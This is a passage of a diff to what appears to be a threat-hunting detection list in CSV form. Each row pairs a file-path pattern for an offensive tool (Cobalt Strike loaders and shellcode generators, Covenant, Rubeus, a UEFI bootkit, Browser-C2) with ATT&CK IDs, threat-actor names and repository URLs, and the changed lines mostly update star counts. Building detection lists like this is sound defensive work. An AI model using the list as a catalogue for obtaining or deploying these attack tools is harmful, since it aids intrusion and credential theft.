menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*/BokuLoader/*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" "*/BooExecutor.cs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" -"*/bootkit-rs*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","448","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" +"*/bootkit-rs*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","449","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" "*/bq1iFEP2/assert/dll/*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" "*/bq1iFEP2/assert/exe/*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" "*/BRC4_rar","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" @@ -2949,97 +2955,97 @@ "*/Bropper.git*","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","1","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "*/bropper.py*","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","1","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "*/Browser-C2*","offensive_tool_keyword","Browser-C2","Post Exploitation agent which uses a browser to do C2 operations.","T1105 - T1043 - T1102","TA0003 - TA0005 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/Browser-C2","1","1","N/A","10","10","99","32","2018-05-25T15:12:21Z","2018-05-22T14:33:24Z" -"*/Brute/BruteStager*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/Brute/BruteStager*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/bruteforce.py*","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","336","57","2023-03-16T09:45:53Z","2022-03-01T14:31:27Z" -"*/Bruteforcer.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*/Bruteforcer.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "*/bruteratel*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*/BruteSploit*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","665","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" +"*/BruteSploit*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" "*/brutespray/*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/BruteStager.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/BruteStager.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/BucketLoot.git*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" -"*/build/encrypted_shellcode*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","554","107","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" -"*/build/formatted_shellcode*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","554","107","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" -"*/build/shellcode*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","554","107","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*/build/encrypted_shellcode*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*/build/formatted_shellcode*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*/build/shellcode*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" "*/BuildBOFs/*","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ceramicskate0/BOF-Builder","1","1","N/A","10","10","23","3","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z" "*/burp/releases/community/latest*","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/burp-api/*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z" "*/burp-Dirbuster*","offensive_tool_keyword","dirbuster","Dirbuster plugin for Burp Suite","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/vulnersCom/burp-Dirbuster","1","1","N/A","N/A","1","71","28","2017-02-22T08:31:32Z","2017-02-22T08:24:05Z" "*/burpee.py*","offensive_tool_keyword","cobaltstrike","Quick python utility I wrote to turn HTTP requests from burp suite into Cobalt Strike Malleable C2 profiles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CodeXTF2/Burp2Malleable","1","1","N/A","10","10","320","32","2023-04-06T15:24:12Z","2022-08-14T18:05:39Z" "*/BurpExtender.java*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0010 - TA0007 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z" -"*/burp-proxy*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/burp-proxy*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/BurpSuite-collections*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*/BUYTHEAPTDETECTORNOW*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 